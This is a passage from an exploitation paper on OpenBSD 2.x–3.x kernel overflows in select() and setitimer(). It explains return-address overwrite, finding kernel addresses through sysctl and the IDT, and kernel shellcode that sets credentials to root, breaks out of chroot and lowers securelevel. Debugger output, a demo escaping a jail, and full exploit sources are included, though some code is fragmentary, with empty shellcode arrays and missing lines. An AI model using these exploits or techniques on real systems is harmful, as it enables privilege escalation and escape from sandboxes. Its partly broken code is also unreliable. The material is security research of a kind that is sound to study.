ddb> boot sync

--[ 3.2 - Payload storage problem

The payload storage area for user land vulnerabilities is usually the
overflowed buffer itself (if it's big enough) or some known user controlled
other location such like environment variables, pre-overflow command
leftovers, etc, etc, in short, any user controlled memory that will stay
resident long enough to reference at a later time. Since the overflowed
buffer may be small in size, it is not always feasible to store the payload
there. Actually, for this specific buffer overflow, the contents of the
overflowed buffer get corrupted leaving us no chance to return to it. Also,
we will need enough room to execute code in kernel space to be able to do
complex tasks, such as resetting the chroot pointers, altering pcred, ucred
and securelevel and resolving where to return to ... for all these reasons
we are going to execute payload in the source buffer as opposed to the
destination (overflowed) buffer. This means we're going to jump to the user
land page, execute our payload and return back to our caller transparently.
This is all legitimate execution and we will have almost unlimited space to
execute our payload. In regards to the select() overflow: copyin(ubuf,
kbuf, big_num), we'll execute code inside 'ubuf'.

--[ 3.3 - Return to user land problem

After we gain control and execute our payload, we need to clean things up
and start our journey to user land but this isn't as easy as it may sound.
My first approach was to do an 'iret' (return from interrupt) in the
payload after altering all necessary kernel structures but this approach
turn out to be real painful. First of all, it's not an easy task to do all
the post-syscall handling done by syscall() function. Also, the trap() code
for kernel to user land transition can not be easily turn into payload
assembly code. However the most obvious reason, not to choose the 'iret'
technique is that messing with important kernel primitives such as locks,
pending signals and/or mask-able interrupts is a really risky job thus
drastically reducing the reliability of exploits and increasing the
potential for post exploitation kernel panics. So I choose to stay out of
it! ;)

The solution was obvious, after payload execution we should return to the
point in syscall() handler where _sys_select() was supposed to return.
After that point, we don't need to care about any of the aforementioned
kernel primitives. This solution leads to the question of how to find out
where to return into since we have overwritten the return address to gain
control thus losing our caller's location. We will explorer many of the
possible solutions in section 5 and usage of the idtr register for kernel
land address gathering will be introduced on section 5.2 for some serious
fun!! Let's get going ...

--[ 4 - Crafting the exploit

In this section, setting up of proper breakpoints and how to calculate the
distance to the saved instruction pointer will be discussed. Also, a new
version of test code will be presented in order to demostrate that
execution can be successfully directed to the user land buffer.

--[ 4.1 - Breakpoints & Distance Calculation

bash-2.05a# nm /bsd | grep _sys_select
e045f58c T _linux_sys_select
e01c5a3c T _sys_select
bash-2.05a# objdump -d --start-address=0xe01c5a3c --stop-
>  /bsd | grep _copyin
e01c5b72:       e8 f9 a9 f3 ff          call   e0100570 <_copyin>
e01c5b9f:       e8 cc a9 f3 ff          call   e0100570 <_copyin>
e01c5bcc:       e8 9f a9 f3 ff          call   e0100570 <_copyin>
e01c5bf9:       e8 72 a9 f3 ff          call   e0100570 <_copyin>

The first copyin() is the one that copies the readfds and overflows the
kernel stack. That's the one we are after.

bash-2.05a# Stopped at _Debugger+0x4: leave
ddb> x/i 0xe01c5b72
_sys_select+0x136:	call	_copyin
ddb> break _sys_select+0x136
ddb> cont
bash-2.05a# ./test2
Breakpoint at	_sys_select+0x136:	call	_copyin
ddb> x/x $esp,3
0xe461de20:	5f38	e461de78	10000000

These are the 3 arguments pushed on the stack for copyin() ubuf: 0x5f38
kbuf: 0xe461de78 len:10000000

ddb> x/x 0x5f38
0x5f38:	41414141
ddb> x/x $ebp
0xe461df38:	e461dfa8	--> saved %ebp
ddb> ^M
0xe461df3c:	e02f34ce	--> saved %eip 

In the x86 calling convention, 2 longs just before the base pointer are the
saved eip (return address) and the saved ebp, respectively. To calculate
the distance between the stack buffer and the saved eip in ddb is done as

ddb> print 0xe461df3c - 0xe461de78
ddb> boot sync

The distance between the address of saved "return address" and the kernel
buffer is 196 (0xc4) bytes. Limiting our copyin() operation to 200 bytes
with the mprotect() technique will ensure a clean overflow.

4.2 - Return address overwrite & execution redirection

At this stage I'll introduce another test code to "verify" execution
redirection and usability of the user land buffer for payload execution.


#include <stdio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>

        char *buf;
        long *lptr;
        u_long pgsz = sysconf(_SC_PAGESIZE);

        buf = (char *) malloc(pgsz * 3);
        if(!buf) { perror("malloc"); exit(-1); }
        memset(buf, 0xcc, pgsz*3); /* int3 */

        buf = (char *) (((u_long) buf & ~pgsz) + pgsz);

	if(mprotect((char *) ((u_long) buf + pgsz), (size_t) pgsz,
		PROT_WRITE) < 0)
		perror("mprotect"); exit(-1);

        lptr = (long *) ((u_long)buf + pgsz - 8);
        *lptr++ = 0xbaddcafe; /* saved %ebp, does not 
			       * matter at this stage
        *lptr++ = (long) buf; /* overwrite the return addr 
			       * with buf's addr
	select(0x80000000, (fd_set *) ((u_long) buf + pgsz - 200), NULL,

test3.c code will overwrite the saved ebp with 0xbaddcafe and the saved
instruction pointer with the address of the user land buffer, which is
filled with 'int 3''s (debug interrupts). This code should kick in the
kernel debugger.

bash-2.05a# gcc -o test3 test3.c
bash-2.05a# ./test3
Stopped at	0x5001:	int	$3
ddb> x/i $eip,2
0x5001:	int	$3
0x5002: int	$3
ddb> print $ebp
ddb> boot sync

Everything goes as planned, we successfully jump to user land and execute
code. Now we shall concentrate on other issues such as payload/shellcode
creation, symbol address gathering on run time, etc...

--[ 5 - How to gather offsets & symbol addresses

Before considering what to achieve with kernel payload, I should remind you
about the previous questions that we raised which was how to return back to
user land, the proposed solution was basically to fix up %ebp, find out
where syscall() handler is in memory, plus where in syscall() we should be
returning. Payload is the obvious place to do the mentioned fix- ups but
this brings the complication of how to gather kernel addresses. After
dealing with some insufficient pre-exploitation techniques such like 'nm
/bsd', kvm_open() and nlist() system interfaces which are all lacking the
solution for non-reable (in terms of fs permissions) kernel image (/bsd).
I come to the conclusion that all address gathering should be done on run
time (in the execution state of the payload). Many win32 folks have been
doing this type of automation in shellcodes by walking through the thread
environment block (TEB) for some time. Also kernel structures such like the
process structure has to be supplied to the payload in order to achieve our
goals. Following sections would introduce the proposed solutions for kernel
space address gathering.

--[ 5.1 - sysctl() syscall

sysctl() system call will enable us to gather process structure information
which is needed for the credential and chroot manipulation payloads. In
this section we will take a brief look into the internals of the sysctl()

sysctl is a system call to get and set kernel level information from user
land. It has a good interface to pass data from kernel to user land and
back. sysctl interface is structured into several sub components such as
the kernel, hardware, virtual memory, net, filesystem and architecure
system control interfaces. We'll concentrate on the kernel sysctl's which
is handled by the kern_sysctl()function. See: sys/kern/kern_sysctl.c:234
kern_sysctl() function also assigns different handlers to certain queries
such as proc structure, clockrate, vnode and file information. The process
structure is handled by the sysctl_doproc() function and this is the
interface to kernel land information that we are after!

sysctl_doproc(name, namelen, where, sizep)
        int *name;
        u_int namelen;
        char *where;
        size_t *sizep;


[1] for (; p != 0; p = LIST_NEXT(p, p_list)) {

[2]        switch (name[0]) {

                case KERN_PROC_PID:
                        /* could do this with just a lookup */
[3]                     if (p->p_pid != (pid_t)name[1])



                if (buflen >= sizeof(struct kinfo_proc)) {
[4]                     fill_eproc(p, &eproc);
[5]                     error = copyout((caddr_t)p, &dp->kp_proc,
                                        sizeof(struct proc));

fill_eproc(p, ep)
        register struct proc *p;
        register struct eproc *ep;
        register struct tty *tp;

[6]        ep->e_paddr = p;

Also for sysctl_doproc() there can be different types of queries which are
handled by the switch [2] statement. KERN_PROC_PID is the query that is
sufficient enough to gather the needed address about any process's proc
structure. For the select() overflow it was sufficient enough just to
gather the parent process's proc address but the setitimer() vulnerability
make use of the sysctl() interface in many different ways (more on this

sysctl_doproc() code iterates through [1] the linked list of proc
structures in order to find the queried pid [3], and, if found, certain
structures (eproc & kp_proc) get filled-in [4], [5] and copyout to user
land. fill_eproc() (called  from [4]) does the trick [6] and copies the
proc address of the queried pid into the e_paddr member of the eproc
structure, which, in turn, was eventually copied out to user land in the
kinfo_proc structure (which is the main data structure for the
sysctl_doproc() function). For further information on members of these
structures see: sys/sys/sysctl.h.

The following is the function we'll be using to retrieve the kinfo_proc

get_proc(pid_t pid, struct kinfo_proc *kp)
   u_int arr[4], len;
        arr[0] = CTL_KERN;
        arr[1] = KERN_PROC;
        arr[2] = KERN_PROC_PID;
        arr[3] = pid;
        len = sizeof(struct kinfo_proc);
        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {

It is a pretty straightforward interface, what happens is: CTL_KERN will be
dispatched to kern_sysctl() by sys_sysctl() KERN_PROC will be dispatched to
sysctl_doproc() by kern_sysctl() KERN_PROC_PID will be handled by the
aforementioned switch statement, eventually returning the kinfo_proc

sysctl() system call might be there with all good intensions such as
getting and setting kernel information in a dynamic fashion. However, from
a security point of view, I believe sysctl() syscall should not be blindly
giving proc information about any queried pid. Credential checks should be
added in proper places, especially for the systcl_doproc() interface ...

--[ 5.2 - sidt technique & _kernel_text search

As mentioned before, we are after transparent payload execution so that
_sys_select() will actually return to its caller _syscall() as expected.  I
will explain how to gather the return path in this section. The solution
depends on the idtr (interrupt descriptor table register) that contains a
fixed location address, which is the start of the Interrupt Descriptor
Table (IDT).

Without going into too many details, IDT is the table that holds the
interrupt handlers for various interrupt vectors. Each interrupt in x86 is
represented by a number in the range 0 - 255 and these numbers are called
the interrupt vectors. These vectors are used to locate the initial handler
for any given interrupt inside the IDT. IDT contains 256 entries, each
being 8 bytes. IDT descriptor entries can be 3 different types but we will
concentrate only on the gate descriptor:


struct gate_descriptor {
        unsigned gd_looffset:16;        /* gate offset (lsb) */
        unsigned gd_selector:16;        /* gate segment selector */
        unsigned gd_stkcpy:5;           /* number of stack wds to cpy */
        unsigned gd_xx:3;               /* unused */
        unsigned gd_type:5;             /* segment type */
        unsigned gd_dpl:2;              /* segment descriptor priority 
level */
        unsigned gd_p:1;                /* segment descriptor present */
        unsigned gd_hioffset:16;        /* gate offset (msb) */

gate_descriptor's members gd_looffset and gd_hioffset will form the low
level interrupt handler's address. For more information on the various
fields, reader should consult to the architecture manuals [Intel]. 

System call interface to request kernel services is implemented through the
software initiated interrupt: 0x80. Armored with this knowledge, starting
from the address of the low level syscall interrupt handler and walking
through the kernel text, we can find our way to the high level syscall
handler and finally return to it. 

Interrupt descriptor table under OpenBSD is named _idt_region and slot
number: 0x80 is the gate descriptor for the system call interrupt 'int
0x80'. Since every member is 8 bytes, system call gate_descriptor is at
address '_idt_region + 0x80 * 0x8' which is '_idt_region + 0x400'. 

bash-2.05a# Stopped at		_Debugger+0x4: leave
ddb> x/x _idt_region+0x400
_idt_region+0x400:	80e4c
ddb> ^M
_idt_region+0x404:	e010ef00

To figure out the initial syscall handler we need to do the proper 'shift'
and 'or' operations on the gate descriptor bit fields, which leads to the
0xe0100e4c kernel address.

bash-2.05a# Stopped at          _Debugger+0x4: leave
ddb> x/x 0xe0100e4c
_Xosyscall_end:	pushl	$0x2
ddb> ^M
_Xosyscall_end+0x2:	pushl	$0x3
_Xosyscall_end+0x20:	call	_syscall

As per exception or software initiated interrupt, the corresponding vector
is found in the IDT and the execution is redirected to the handler gathered
from the gate descriptor. This is an intermediate handler and will
eventually take us to real handler. As seen at the kernel debugger output,
the initial handler _Xosyscall_end saves all registers (also some other low
level stuff) and immediately calls the real handler which is _syscall().

We have mentioned that the idtr register always contains the address of the
_idt_region, here is the way to access its content:

sidt 0x4(%edi)
mov  0x6(%edi),%ebx  

Address of the _idt_region is moved to ebx and IDT can now be referenced
via ebx. Assembly code to gather the syscall handler starting from the
initial handler is as follows;

sidt 0x4(%edi)
mov  0x6(%edi),%ebx     # mov _idt_region is in ebx
mov  0x400(%ebx),%edx   # _idt_region[0x80 * (2*sizeof long) = 0x400]
mov  0x404(%ebx),%ecx   # _idt_region[0x404]
shr  $0x10,%ecx	        #
sal  $0x10,%ecx	        # ecx = gd_hioffset
sal  $0x10,%edx	        #
shr  $0x10,%edx         # edx = gd_looffset
or   %ecx,%edx          # edx = ecx | edx  =  _Xosyscall_end

At this stage we have successfully found the initial/intermediate handler's
location, so the next step is to search through the kernel text, find 'call
_syscall', gather the displacement of the call instruction and add it to
the address of the instruction's location. Also plus 5 should be added to
the displacement for the size of the call instruction.

xor  %ecx,%ecx          # zero out the counter
inc  %ecx
movb (%edx,%ecx),%bl    # bl =  _Xosyscall_end++
cmpb $0xe8,%bl          # if bl == 0xe8 : 'call'
jne  up

lea  (%edx,%ecx),%ebx   # _Xosyscall_end+%ecx: call _syscall
inc  %ecx
mov  (%edx,%ecx),%ecx   # take the displacement of the call ins.
add  $0x5,%ecx          # add 5 to displacement
add  %ebx,%ecx          # ecx = _Xosyscall_end+0x20 + disp = _syscall()

At this stage %ecx holds the address of the real handler _syscall(). The
next step is to find out where to return inside the syscall() function
which eventually leads to a broader research on various versions of OpenBSD
with various kernel compilation options. Luckily, it turns out to be safe
to search for the 'call *%eax' instruction inside the _syscall(), because
this turns out to be the instruction that dispatches every system call to
its final handler in every OpenBSD version I have tested.

For OpenBSD 2.6 through 3.1 kernel code always dispatched the system calls
with the 'call *%eax' instruction, which is unique in the scope of
_syscall() function.

bash-2.05a# Stopped at          _Debugger+0x4: leave
ddb> x/i _syscall+0x240
_syscall+0x240:	call	*%eax

Our goal is now to figure out the offset (0x240 in the above disasm) for
any kernel version so that we can return to the instruction just after it
from our payload and achieve our goal. The code to search for 'call *%eax'
is as follows:

# _syscall+0x240: ff
# _syscall+0x241: d0    0x240->0x241 OBSD3.1

mov  %ecx,%edi         # ecx is the addr of _syscall 
movw $0xd0ff,%ax       # search for ffd0 'call *%eax'
mov  $0xffffffff,%ecx
scasw                  # scan (%edi++) for %ax

# %edi gets incremented one last time before breaking the loop
# %edi contains the instruction address just after 'call *%eax' 
# so return to it!!!

xor  %eax,%eax         #set up the return value = Success ;)

push %edi              # push %edi on the stack and return to it

Finally, this is all we needed for a clean return. This payload can be used
for any syscall overflow without requiring any further modification.

--[ 5.3 - _db_lookup() technique 

This technique introduces no new concepts; it is just another kernel text
search to find out the address of _db_lookup() -- the kernel land
equivalent of dlsym(). The search is based on the function fingerprint,
which is fairly safe on the recent versions on which the code has been
developed, but it might not work on the older versions. I choose to keep it
out of the text for brevity's sake but it's exact the same 'repnz scas'
concept just used in the idtr technique. (for sample code, contact me.)

--[ 5.4 - /usr/bin/nm, kvm_open(), nlist()

/usr/bin/nm, kvm library and nlist() library interface can all be used to
gather kernel land symbols and offsets but, as we already mentioned, they
all require a readable kernel image and/or additional privileges which in
most secured systems are not usually avaliable.

Furthermore, the most obvious problem with these interfaces are that they
won't work at all in chroot()ed environments with no privileges (nobody).
These are the main reasons I have not used these techniques within the
exploitation phase of privilege escalation and chroot breaking, but after
establishing full control over the system (uid = 0 and out of jail), I have
made use of offline binary symbol gathering in order to reset the
securelevel, more about this later.

--[ 5.5 - %ebp fixup

After taking care of the saved return address, we need to fix %ebp to
prevent crashes in later stages (especially in _syscall() code). The proper
way to calculate %ebp is to find out the difference between the stack
pointer and the saved base pointer at the procedure exit and used this
static number to restore %ebp. For all the versions of OpenBSD 2.6 through
3.1 this difference was 0x68 bytes. You can simply set a breakpoint on
_sys_select prolog and another one just before the 'leave' instruction at
the epilog and calculate the difference between the %ebp recorded at the
prolog and the %esp recorded just before the epilog.

lea  0x68(%esp),%ebp # fixup ebp

Above instruction would be enough to set the %ebp back to its old value.

--[ 6 - Payload/Shellcode Creation

In the following sections we'll develop small payloads that modify certain
fields of its parent process' proc structure to achieve elevated privileges
and break out of chroot/jail environments. Then, we'll chain the developed
assembly code with the sidt code to work our way back to user land and
enjoy our new privileges.

--[ 6.1 - What to achieve

Setting up a jail with nobody privileges and trying to break out of it
seems like a fairly good goal to achieve. Since all these privilege
separation terms are brought into OpenBSD with the latest OpenSSH, it would
be nice to actually demonstrate how trivial it would be to bypass this kind
of 'protection' by way of such kernel level vulnerabilities.

Certain inetd.conf services and OpenSSH are run as nobody/user in a
chrooted/jailed environment -- intended to be an additional assurance of
security. This is a totally false sense of security; jailme.c code follows:


#include <stdio.h>

        setgroups(NULL, NULL);
        execl("/bin/sh", "jailed", NULL);

bash-2.05a# gcc -o jailme jailme.c
bash-2.05a# cp jailme /tmp/jailme
bash-2.05a# mkdir /var/tmp/jail
bash-2.05a# mkdir /var/tmp/jail/usr
bash-2.05a# mkdir /var/tmp/jail/bin /var/tmp/jail/usr/lib
bash-2.05a# mkdir /var/tmp/jail/usr/libexec
bash-2.05a# cp /bin/sh /var/tmp/jail/bin/
bash-2.05a# cp /usr/bin/id /var/tmp/jail/bin/
bash-2.05a# cp /bin/ls /var/tmp/jail/bin/
bash-2.05a# cp /usr/lib/ /var/tmp/jail/usr/lib/
bash-2.05a# cp /usr/libexec/ /var/tmp/jail/usr/libexec/
bash-2.05a# cat >> /etc/inetd.conf 
1024            stream  tcp     nowait  root    /tmp/jailme
bash-2.05a# ps aux | grep inetd
root     19121  0.0  1.1   148   352 p0  S+     8:19AM    0:00.05 grep 
root     27152  0.0  1.1    64   348 ??  Is     6:00PM    0:00.08 inetd 
bash-2.05a# kill -HUP 27152
bash-2.05a# nc -v localhost 1024
Connection to localhost 1024 port [tcp/*] succeeded!
ls -l /
total 4
drwxr-xr-x  2 0  0  512 Dec  9 16:23 bin
drwxr-xr-x  4 0  0  512 Dec  9 16:21 usr
uid=32767 gid=32767
jailed: <stdin>[4]: ps: not found

--[ 6.2 - The payload

Throughout this section we will introduce all the tiny bits of the complete
payload. So all these section chained together will form the eventual
payload, which will be available at the code section (10) of this paper.

--[ 6.2.1 - p_cred & u_cred

We'll start with the privilege elevation section of the payload. Following
is the payload to update ucred (credentials of user) and pcred (credentials
of the process) of any given proc structure. Exploit code fills in the proc
address of its parent process by using the sysctl() system call (discussed
on 5.1) replacing .long 0x12345678. The following 'call' and 'pop'
instructions will load the address of the given proc structure address into
%edi. The typical address gathering technique used in almost every PIC
%shellcode [ALEPH1].

call moo
.long 0x12345678   <-- pproc addr
.long 0xdeadcafe
.long 0xbeefdead
pop  %edi
mov  (%edi),%ecx      # parent's proc addr in ecx

		      # update p_ruid
mov  0x10(%ecx),%ebx  # ebx = p->p_cred
xor  %eax,%eax        # eax = 0
mov  %eax,0x4(%ebx)   # p->p_cred->p_ruid = 0

	              # update cr_uid
mov  (%ebx),%edx      # edx = p->p_cred->pc_ucred
mov  %eax,0x4(%edx)   # p->p_cred->pc_ucred->cr_uid = 0

--[ 6.2.2 - chroot breaking

Next tiny assembly fragment will be the chroot breaker of our complete

Without going into extra detail (time is running out, deadline is within 3
days ;)), lets take a brief look of how chroot is checked on a per-process
basis. chroot jails are implemented by filling in the fd_rdir member of the
filedesc (open files structure) with the desired jail directories vnode
pointer. When kernel is giving certain services to any process, it checks
for the existence of this pointer and if it's filled with a vnode that
process is handled slightly different and kernel will create the notion of
a new root directory for this process thus jailing it into a predefined
directory. For a regular process this pointer is zero / unset.  So without
any further need to go into implementation level details, just setting this
pointer to NULL means FREEDOM! fd_rdir is referenced through the proc
structure as follows:


As with the credentials structure, filedesc is also trivial to access and
alter, with only 2 instruction additions to our payload.

# update p->p_fd->fd_rdir to break chroot()

mov  0x14(%ecx),%edx  	# edx = p->p_fd
mov  %eax,0xc(%edx)   	# p->p_fd->fd_rdir = 0

--[ 6.2.3 - securelevel  

OpenBSD has 4 different securelevels starting from permanently insecure to
highly secure mode. The system by default runs at level 1 which is the
secure mode. Secure mode restrictions are as follows:

-   securelevel may no longer be lowered except by init
-   /dev/mem and /dev/kmem may not be written to
-   raw disk devices of mounted file systems are read-only
-   system immutable and append-only file flags may not be removed
-   kernel modules may not be loaded or unloaded

Some of these restrictions might complicate further compromise of the
system. So we should also take care of the securelevel flag and reset it to
0, which is the insecure level that gives you privileges such as being able
to load kernel modules to further penetrate the system.

But there were many problems in run time searching of the address of
securelevel in memory without false positives so I chose to utilize this
attack at a later stage. The stage that we get uid 0 and break free out of
jail, now we have all the interfaces available mentioned in section 5.4 to
query any kernel symbol and retrieve its address.

bash-2.05a# /usr/bin/nm /bsd | grep securelevel
e05cff38 B _securelevel

For this reason an additional, second stage exploit was crafted (without
any difference, other then the payload) that executes the following
assembly routine and returns to user land, using the idtr technique. See
ex_select_obsd_secl.c in section 10

call moo
.long 0x12345678     <-- address of securelevel filled by user
pop  %edi
mov  (%edi),%ebx      # address of securelevel in ebx
		      # reset security level to 0/insecure
xor  %eax,%eax        # eax = 0
mov  %eax,(%ebx)      # securelevel = 0


--[ 6.3 - Get root & escape jail

All of the above chained into 2 piece of exploit code. Here is the door to
freedom! (Exploits and payloads can be found in section 10)

bash-2.05a# gcc -o ex ex_select_obsd.c
bash-2.05a# gcc -o ex2 ex_select_obsd_secl.c
bash-2.05a# cp ex /var/tmp/jail/
bash-2.05a# cp ex2 /var/tmp/jail/
bash-2.05a# nc -v localhost 1024
uid=32767 gid=32767
ls /

[*] OpenBSD 2.x - 3.x select() kernel overflow     [*]
[*] by    Sinan "noir" Eren  -  [email protected]   [*]

userland: 0x0000df38 parent_proc: 0xe46373a4
uid=0(root) gid=32767(nobody)
uname -a
OpenBSD kernfu 3.1 GENERIC#59 i386
ls /
sysctl kern.securelevel
kern.securelevel = 1
nm /bsd | grep _securelevel
e05cff38 B _securelevel
./ex2 e05cff38
sysctl kern.securelevel
kern.securelevel = 0

... ;)

Directly copying the exploit into the jailed environment might seem a bit
unrealistic but it really is not an issue with system call redirection
[MAXIMI] or even by using little more imaginative shellcodes, you can
execute anything from a remote source without any further need for a shell
interpreter. To the best of my knowledge there is 2 commercial products
that have already achieved such remote execution simulations. [IMPACT],

--[ 7 - Conclusions

My goal in writing this paper was try to prove kernel land vulnerabilities
such as stack overflows and integer conditions can be exploited and lead to
total control over the system, no matter how strict your user land (i.e.,
privilege separation) or even kernel land (i.e., chroot, systrace,
securelevel) enforcements are ... I also tried to contribute to the newly
raised concepts (greets to Gera) of fail-safe and reusable exploitation
code generation.

I would like to end this article with my favorite vuln-dev posting of all

Subject:   RE: OpenSSH Vulns (new?) Priv seperation
reducing root-run code from 27000 to 2500 lines is the important part.
who cares how many holes there are when it is in /var/empty/sshd chroot
with no possibility of root :)


[ I CARE. lol! ;)]

--[ 8 - Greetings

Thanks to Dan and Dave for correcting my English and committing many logic
fixes. Thanks to certain anonymous people for their help and support.

Greets to: optyx, dan, dave aitel, gera, bind, jeru, #convers
uberhax0r, olympos and gsu.linux ppl

Most thanks of all to goes to Asli for support, help and her never-ending
affection. Seni Seviyorum, mosirrr!!

--[ 9 -	References

- [ESA]     	Exploiting Kernel Buffer Overflows FreeBSD Style

- [LSD-PL]	Kernel Level Vulnerabilities, 5th Argus Hacking Challenge

- [4.4 BSD]	The Design and Implementation of the 4.4BSD Operating

- [Intel]	Intel Pentium 4 Processors Manuals

- [ALEPH1]	Smashing The Stack For Fun And Profit

- [MAXIMI]	Syscall Proxying - Simulating Remote Execution



- [ODED]	Big Loop Integer Protection
		 0x09 by Oded Horovitz

--[ 10 - Code

<++> ./ex_kernel/ex_select_obsd.c
 ** OpenBSD 2.x 3.x select() kernel bof exploit
 ** Sinan "noir" Eren 
 ** [email protected] | [email protected].net
 ** (c) 2002 

#include <stdio.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/sysctl.h>
#include <sys/signal.h>
#include <sys/utsname.h>
#include <sys/stat.h>

/* kernel_sc.s shellcode */ 
unsigned char shellcode[] = 

void sig_handler();
void get_proc(pid_t, struct kinfo_proc *);

main(int argc, char **argv)
   char *buf, *ptr, *fptr;
   u_long pgsz, *lptr, pprocadr;
   struct kinfo_proc kp;

  printf("\n\n[*] OpenBSD 2.x - 3.x select() kernel overflow   [*]\n");
  printf("[*] by  Sinan \"noir\" Eren  -  [email protected]  [*]\n");
  printf("\n\n"); sleep(1);

  	 pgsz = sysconf(_SC_PAGESIZE);  
	 fptr = buf = (char *) malloc(pgsz*4);
	 if(!buf) { 
	 memset(buf, 0x41, pgsz*4);

	buf = (char *) (((u_long)buf & ~pgsz) + pgsz);

	get_proc((pid_t) getppid(), &kp);
	pprocadr = (u_long) kp.kp_eproc.e_paddr;

	ptr = (char *) (buf + pgsz - 200); /* userland adr */
	lptr = (long *) (buf + pgsz - 8);

	*lptr++ = 0x12345678; /* saved %ebp */
	*lptr++ = (u_long) ptr; /*(uadr + 0x1ec0);  saved %eip */

	shellcode[5] = pprocadr & 0xff;
	shellcode[6] = (pprocadr >> 8) & 0xff;
	shellcode[7] = (pprocadr >> 16) & 0xff;
	shellcode[8] = (pprocadr >> 24) & 0xff;

	memcpy(ptr, shellcode, sizeof(shellcode)-1);

        printf("userland: 0x%.8x ", ptr);	
	printf("parent_proc: 0x%.8x\n", pprocadr);

	if( mprotect((char *) ((u_long) buf + pgsz), (size_t)pgsz,
						 PROT_WRITE) < 0) {

	signal(SIGSEGV, (void (*)())sig_handler);
	select(0x80000000, (fd_set *) ptr, NULL, NULL, NULL);



get_proc(pid_t pid, struct kinfo_proc *kp)
   u_int arr[4], len;

        arr[0] = CTL_KERN;
        arr[1] = KERN_PROC;
        arr[2] = KERN_PROC_PID;
        arr[3] = pid;
        len = sizeof(struct kinfo_proc);
        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
                fprintf(stderr, "this is an unexpected error, rerun!\n");

<--> ./ex_kernel/ex_select_obsd.c
<++> ./ex_kernel/ex_select_obsd_secl.c
 ** OpenBSD 2.x 3.x select() kernel bof exploit
 ** securelevel reset exploit, this is the second stage attack
 ** Sinan "noir" Eren 
 ** [email protected] | [email protected]
 ** (c) 2002 

#include <stdio.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/signal.h>
#include <sys/utsname.h>
#include <sys/stat.h>

/* sel_sc.s shellcode */
unsigned char shellcode[] = 

void sig_handler();

main(int argc, char **argv)
   char *buf, *ptr, *fptr;
   u_long pgsz, *lptr, secladr;

	if(!argv[1]) {
	printf("Usage: %s secl_addr\nsecl_addr: /usr/bin/nm /bsd |"
       	" grep _securelevel\n", argv[0]);

	secladr = strtoul(argv[1], NULL, 16);

  	 pgsz = sysconf(_SC_PAGESIZE);  
	 fptr = buf = (char *) malloc(pgsz*4);
	 if(!buf) { 
	 memset(buf, 0x41, pgsz*4);

	buf = (char *) (((u_long)buf & ~pgsz) + pgsz);

	ptr = (char *) (buf + pgsz - 200); /* userland adr */
	lptr = (long *) (buf + pgsz - 8);

	*lptr++ = 0x12345678; /* saved %ebp */
	*lptr++ = (u_long) ptr; /*(uadr + 0x1ec0);  saved %eip */

	shellcode[5] = secladr & 0xff;
	shellcode[6] = (secladr >> 8) & 0xff;
	shellcode[7] = (secladr >> 16) & 0xff;
	shellcode[8] = (secladr >> 24) & 0xff;

	memcpy(ptr, shellcode, sizeof(shellcode)-1);

	if( mprotect((char *) ((u_long) buf + pgsz), (size_t)pgsz,
					 PROT_WRITE) < 0) {

	signal(SIGSEGV, (void (*)())sig_handler);
	select(0x80000000, (fd_set *) ptr, NULL, NULL, NULL);


<--> ./ex_kernel/ex_select_obsd_secl.c
<++> ./ex_kernel/ex_setitimer_obsd.c
 ** OpenBSD 2.x 3.x setitimer() kernel memory write exploit 
 ** Sinan "noir" Eren
 ** [email protected] | [email protected]
 ** (c) 2002

#include <stdio.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/time.h>
#include <sys/sysctl.h>

struct itimerval val, oval;
int which = 0;

main(int argc, char **argv)
   setitimer(which, &val, &oval);
   printf("uid: %d euid: %d gid: %d \n", getuid(), geteuid(), getgid());
   execl("/bin/sh", "noir", NULL);

   unsigned int arr[4], len;
   struct kinfo_proc kp;
   long stat, cred, rem;

	memset(&val, 0x00, sizeof(val));
	val.it_interval.tv_sec = 0x00;  //fill this with cr_ref
	val.it_interval.tv_usec = 0x00;
	val.it_value.tv_sec = 0x00;
	val.it_value.tv_usec = 0x00;

	arr[0] = CTL_KERN;
	arr[1] = KERN_PROC;
	arr[2] = KERN_PROC_PID;
	arr[3] = getpid();
	len = sizeof(struct kinfo_proc);
	if(sysctl(arr, 4, &kp, &len, NULL, 0) < 0) {
		fprintf(stderr, "this is an unexpected error, rerun!\n");

	printf("proc: %p\n\n", (u_long) kp.kp_eproc.e_paddr);
	printf("pc_ucred: %p ", (u_long) kp.kp_eproc.e_pcred.pc_ucred);

	printf("p_ruid: %d\n\n", (u_long) kp.kp_eproc.e_pcred.p_ruid);
	printf("proc->p_cred->p_ruid: %p, proc->p_stats: %p\n", 
	(char *) (kp.kp_proc.p_cred) + 4, kp.kp_proc.p_stats);
        printf("cr_ref: %d\n", (u_long) kp.kp_eproc.e_ucred.cr_ref);
	cred = (long) kp.kp_eproc.e_pcred.pc_ucred;	
	stat = (long) kp.kp_proc.p_stats;
	val.it_interval.tv_sec = kp.kp_eproc.e_ucred.cr_ref;
	printf("calculating which for u_cred:\n");
	which = cred - stat - 0x90;
	rem = ((u_long)which%0x10);
	printf("which: %.8x reminder: %x\n", which, rem);

	switch(rem) {
	case 0x8:
	case 0x4:
	case 0xc:
	case 0x0:
	 printf("using u_cred, we will have perminent euid=0\n");
	 goto out;
	val.it_interval.tv_sec = 0x00;
	cred = (long) ((char *) kp.kp_proc.p_cred+4);
	stat = (long) kp.kp_proc.p_stats;

	printf("calculating which for u_cred:\n");
	which = cred - stat - 0x90;	
	rem = ((u_long)which%0x10);
	printf("which: %.8x reminder: %x\n", which, rem);

	switch(rem) {
	case 0x8:
	case 0x4:
	 printf("too bad rem is fucked!\nlet me know about this!!\n"); 
	case 0x0:
	case 0xc:
	 which += 0x10;
	printf("\nusing p_cred instead of u_cred, only the new process "
	       "will be priviliged\n");

	which = which >> 4;
	printf("which: %.8x\n", which);	
	printf("addr to overwrite: %.8x\n", stat + 0x90 + (which * 0x10));
<--> ./ex_kernel/ex_setitimer_obsd.c
<++> ./ex_kernel/kernel_sc.s
# kernel level shellcode
# [email protected] |  [email protected]
# 2002
	.align 2,0x90

.globl _main
	.type	_main , @function

call moo
.long 0x12345678
.long 0xdeadcafe
.long 0xbeefdead
pop  %edi
mov  (%edi),%ecx      # parent's proc addr on ecx

# update p_cred->p_ruid
